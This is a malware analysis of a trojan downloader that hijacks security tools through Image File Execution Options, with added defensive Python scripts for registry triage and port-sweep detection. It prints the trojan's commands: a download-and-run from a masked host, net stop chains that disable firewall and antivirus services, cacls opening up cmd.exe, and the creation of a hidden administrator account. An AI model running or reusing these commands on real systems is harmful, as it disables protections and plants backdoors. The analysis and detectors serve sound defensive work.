Zombie Hunter variant (肉雞獵人變種)

The Zombie Hunter variant (肉雞獵人變種; 肉雞, literally "broiler chicken", is Chinese slang for a compromised machine) is a trojan downloader. To hide itself it gives its files and registry entries names that resemble legitimate system components (SoundMan.exe, svchost.exe). Besides downloading a large number of other malware samples it severely damages the system: it stops and disables security software, hijacks a large number of programs through Image File Execution Options (IFEO) "Debugger" entries, and attempts to set up a backdoor administrator account.

Basic information

  • Chinese name: 肉雞獵人變種
  • Detection name: Win32.Troj.Downloader.vb.81920
  • Virus type: Trojan downloader
  • Virus length: 81920 bytes

Overview

Virus name: Win32.Troj.Downloader.vb.81920
Virus type: Trojan downloader
Virus length: 81920 bytes
Affected systems: Win9x, WinMe, Linux (as listed on the page; the paths and commands described below are those of Windows 2000/XP, and a Win32 executable does not run on Linux)
Dropped virus files: C:\Por.aed
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\CA05MZGT.htm

Description

1. Dropped virus files (the Documents and Settings paths belong to the analysis account "fish"; the Content.IE5 sub-folders are Internet Explorer's randomly named cache directories)
C:\Por.aed
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\2PF3QNZE\CA05MZGT.htm
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\C4DGV5NI\gx[1].jpg
C:\Documents and Settings\fish\Local Settings\Temporary Internet Files\Content.IE5\R146ZVU7\notepde[1].jpg
C:\Program Files\360safe\safemon\safemes.dll
C:\WINDOWS\SoundMan.exe
C:\WINDOWS\system32\interne.exe
C:\WINDOWS\system32\Man.exe
C:\WINDOWS\system32\no1.ini
C:\WINDOWS\system32\note2.ini
C:\WINDOWS\system32\notepde.exe
C:\WINDOWS\system32\qoq.exe
C:\WINDOWS\system32\tjj5.ini
2. Adds an autostart entry (the page calls it a service) so that the file is loaded at every boot:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundMan = SoundMan.exe
Image-hijacks a large number of programs through Image File Execution Options: for 360Loader.exe, 360Safe.exe, 360tray.exe, IceSword, Iparmor.exe, kmailmon.exe, ras, runiep and taskmgr.exe it sets "Debugger"="svchost.exe" (Windows then starts svchost.exe with the tool's command line instead of the tool; svchost.exe exits at once, so the security software never runs), and for ctfmon.exe it sets "Debugger"="SoundMan.exe" (every logon that would start the text-services process starts the trojan instead):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Loader.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Loader.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe Debugger "SoundMan.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kmailmon.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kmailmon.exe Debugger "svchost.exe"
...
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ras
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ras Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep Debugger "svchost.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe Debugger "svchost.exe"
Modifies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL so that hidden files are not displayed.
Deletes the startup entries of security software under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
kav KavPFW vptray runeip RavTask RfwMain 360Loader.exe ras 360Safe.exe 360Safetray
3. The URLs in the files the virus generates are obtained by decrypting embedded strings:
CA05MZGT.htm
gx[1].jpg
notepde[1].jpg
4. Enumerates processes
Checks whether the sniffing tools "fint2005.exe", "ehsniffer.exe" or "iris.exe" are running; whether they are or not, it waits 10 minutes and then goes online:
with InternetOpenUrlA and InternetReadFile it reads the list in http://xxxxxxxx.com/rc/1500/gx[1].txt and downloads http://xxxxxx.com/rc/1500/gx[1].jpg (the .jpg extension is only a disguise)
to c:\windows\system32\vbb.exe and runs it.
"cacls.exe C:\WINDOWS\system32\cmd.exe /e /t /g everyone:F" grants the Everyone group (that is, all users) full control of cmd.exe, then
cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc
start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"
stops the security software's services and disables the first two (wscsvc is Security Center and sharedaccess the Windows Firewall/Internet Connection Sharing service; KPfwSvc and KWatchsvc belong to Kingsoft, McShield to McAfee).
5. Searches the process list for kmailmon.exe kavstart.exe shstat.exe runiep.exe ras.exe MPG4C32.exe imsins.exe Iparmor.exe
360safe.exe 360tray.exe cacls.exe ccenter.exe and ends them with TerminateProcess.
6. "cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators new1 /add"
adds an administrator account new1 with the password 12369, writes this information to %windir%\1.inf, then calls rundll32.exe to repoint the Help and Support service at
C:\WINDOWS\system32\interne.exe, and deletes 1.inf. It hides the new1 account from the logon screen by adding the value
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1" set to 0 (1 would show it).
If the account cannot be created it removes it with "cmd.exe /c net user new1 /del".
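The registry artefacts of steps 2 and 6 can be triaged from a .reg export of the keys involved. The script below is an added example, not code from the page or from any tool named on it: it parses a constructed export that reproduces the entries above (with a benign windbg.exe entry and a default hidden account added as decoys), flags IFEO Debugger values naming anything other than a known debugger, UserList entries set to 0 beyond the accounts Windows XP hides by default, a SHOWALL CheckedValue other than the stock 1, and Run entries that give a bare file name the way the SoundMan entry does. KNOWN_DEBUGGERS and DEFAULT_HIDDEN are assumptions to adjust per environment.

```python
"""Triage a .reg export for the registry artefacts described in steps 2 and 6:
IFEO "Debugger" hijacks, a hidden logon account, the SHOWALL change and a
Run entry that points at a bare file name."""
import re
from collections import defaultdict

# Constructed sample export (not taken from the page): the key paths are the
# ones the writeup lists; the notepad.exe/windbg.exe entry and HelpAssistant
# are benign decoys added so the checks have something to ignore.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SoundMan.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]
"Debugger"="SoundMan.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\windbg.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"HelpAssistant"=dword:00000000
"new1"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
"""

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
USERLIST = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
SHOWALL = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
RUN = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Programs that legitimately appear as an IFEO Debugger (assumption: extend per site).
KNOWN_DEBUGGERS = {"windbg.exe", "ntsd.exe", "cdb.exe", "vsjitdebugger.exe", "drwtsn32.exe"}
# Accounts Windows XP hides from the welcome screen by default (assumption: verify per build).
DEFAULT_HIDDEN = {"HelpAssistant", "SUPPORT_388945a0", "TsInternetUser"}

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|@)=(?P<data>.*)$')


def parse_reg(text):
    """Parse a .reg export into {key path: {value name: data}}.
    String data is unescaped, dword data becomes int, other types stay raw."""
    keys = defaultdict(dict)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            keys[current]  # register keys that carry no values
            continue
        m = VALUE_RE.match(line)
        if not m or current is None:
            continue
        name = m.group("name") if m.group("name") is not None else "@"
        data = m.group("data")
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            data = re.sub(r"\\(.)", r"\1", data[1:-1])  # \\ -> \ and \" -> "
        elif data.lower().startswith("dword:"):
            data = int(data[6:], 16)
        keys[current][name] = data
    return keys


def debugger_basename(debugger):
    """Executable name from a Debugger value such as '"C:\\x\\windbg.exe" -p %ld'."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', debugger)
    exe = (m.group(1) or m.group(2)) if m else debugger
    return exe.rsplit("\\", 1)[-1].lower()


def find_artifacts(keys):
    """Return (kind, name, data) tuples for the artefacts the description lists."""
    by_path = {path.lower(): values for path, values in keys.items()}
    findings = []
    for path, values in keys.items():
        if path.lower().startswith(IFEO.lower() + "\\") and "Debugger" in values:
            hijacked = path.rsplit("\\", 1)[1]
            if debugger_basename(values["Debugger"]) not in KNOWN_DEBUGGERS:
                findings.append(("ifeo_hijack", hijacked, values["Debugger"]))
    for name, data in by_path.get(USERLIST.lower(), {}).items():
        if data == 0 and name not in DEFAULT_HIDDEN:
            findings.append(("hidden_account", name, data))
    showall = by_path.get(SHOWALL.lower(), {})
    if showall.get("CheckedValue", 1) != 1:  # stock value is dword 1
        findings.append(("showall_tampered", "CheckedValue", showall["CheckedValue"]))
    for name, data in by_path.get(RUN.lower(), {}).items():
        if isinstance(data, str) and "\\" not in data:  # bare name resolved via the search path
            findings.append(("run_bare_name", name, data))
    return findings


if __name__ == "__main__":
    for kind, name, data in find_artifacts(parse_reg(SAMPLE_REG)):
        print(f"{kind:16} {name} -> {data!r}")
```

On a live machine the export is produced with `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" nt.reg` (and the same for the Windows key), which works from a clean boot medium when the infected system's own shell can no longer be trusted.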
7. Fetches "http://webipcha.cn/ip/ip.asp" to learn the current external IP address; "cmd /c route print|find "Default Gateway: ">c:\ip.txt"
writes the gateway address to c:\ip.txt, which the trojan reads back and then deletes.
8. Checks whether avp.exe (Kaspersky) is among the running processes; if it is, changes the system date to 15 July 2001.
9. Drops the port scanner qoq.exe (Dotpot PortReady Ver1.6) into %windir%\system32\, scans the C-class ranges above and below the gateway for hosts with port 135 open,
records them in Por.aed, scans four C-class ranges on the external IP, then "cmd.exe /c move "c:\Por.aed" "%SystemRoot%\system32\Por.aed"&exit"
10. Drops popo.exe into the directory the virus runs from and reads the addresses with port 135 open out of Por.aed: "cmd.exe /c start C:\popo.exe ip &exit"
(for example cmd.exe /c start C:\popo.exe 192.1**.18.15 &exit; popo.exe then runs a dictionary password attack against that host)
11. When the scan is finished, deletes qoq.exe, Por.aed and popo.exe.
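What steps 7 and 9 amount to in address space, and what the resulting TCP/135 sweep looks like from the network side, as an added example (not code from the page or from the Dotpot scanner): the script parses a constructed `route print` tail the way the trojan's find filter does, derives the /24 ranges around the gateway and the external IP, generates constructed connection records for the first hosts such a sweep would touch, and applies a distinct-target count that flags the sweeping host. The reading of "C-class ranges above and below the gateway" as the gateway's own /24 plus one on each side, and of "four ranges on the external IP" as four consecutive /24s starting from its own, is an assumption, as are the sample addresses and the record format.

```python
"""Reconstruct the TCP/135 sweep in steps 7 and 9 from what the trojan itself
gathers (the default gateway from `route print`, the external IP), and show
the counting rule that spots such a sweep in connection records."""
import ipaddress
import re

# Constructed Windows XP `route print` tail (sample text, not from the page).
SAMPLE_ROUTE_PRINT = """\
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      10.20.30.1     10.20.30.77       20
       10.20.30.0    255.255.255.0     10.20.30.77     10.20.30.77       20
Default Gateway:        10.20.30.1
===========================================================================
"""

GATEWAY_RE = re.compile(r"Default Gateway:\s*(\d{1,3}(?:\.\d{1,3}){3})")


def parse_default_gateway(route_print_output):
    """Pick out the gateway, as the trojan's `route print | find "Default Gateway: "` does."""
    m = GATEWAY_RE.search(route_print_output)
    if not m:
        raise ValueError("no Default Gateway line in route print output")
    return ipaddress.IPv4Address(m.group(1))


def slash24s_around(addr, below, above):
    """The /24 containing addr plus `below` lower and `above` higher /24s, in order."""
    base = ipaddress.ip_network(f"{addr}/24", strict=False)
    nets = []
    for offset in range(-below, above + 1):
        start = int(base.network_address) + offset * 256
        if 0 <= start < 2 ** 32:  # skip ranges that would fall off the address space
            nets.append(ipaddress.IPv4Network((start, 24)))
    return nets


def sweep_targets(route_print_output, external_ip):
    """Networks qoq.exe probes for open TCP/135: the gateway's /24 with the one below
    and the one above it, then four consecutive /24s starting at the external IP's own
    (assumption: this is how the page's "ranges above and below" and "four ranges" are read)."""
    nets = slash24s_around(parse_default_gateway(route_print_output), 1, 1)
    nets += slash24s_around(ipaddress.IPv4Address(external_ip), 0, 3)
    unique = []
    for n in nets:  # keep order, drop overlaps between the two lists
        if n not in unique:
            unique.append(n)
    return unique


def host_count(nets):
    """Usable hosts across the swept networks (network and broadcast excluded)."""
    return sum(n.num_addresses - 2 for n in nets)


def simulated_sweep(src, nets, limit):
    """Constructed connection records (src, dst, dport) for the first `limit`
    hosts the scanner would touch, to feed the detector below."""
    records = []
    for net in nets:
        for host in net.hosts():
            if len(records) == limit:
                return records
            records.append((src, str(host), 135))
    return records


def detect_port135_sweep(records, min_targets=20):
    """Sources that connected to at least `min_targets` distinct hosts on TCP/135.
    A workstation has no reason to contact dozens of RPC endpoint mappers in a row."""
    targets = {}
    for src, dst, dport in records:
        if dport == 135:
            targets.setdefault(src, set()).add(dst)
    return {src: len(d) for src, d in targets.items() if len(d) >= min_targets}


if __name__ == "__main__":
    nets = sweep_targets(SAMPLE_ROUTE_PRINT, "203.0.113.45")
    print(len(nets), "networks,", host_count(nets), "hosts")
    records = simulated_sweep("10.20.30.77", nets, 60)
    records += [("10.20.30.5", "10.20.30.10", 135), ("10.20.30.5", "10.20.30.10", 445)]
    print(detect_port135_sweep(records))
```

With the sample gateway and external address the sweep covers seven /24s, about 1,800 hosts, from a single infected workstation; the threshold in detect_port135_sweep is a starting point and should sit above whatever legitimate RPC fan-out (domain controllers, management servers) exists on the network.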
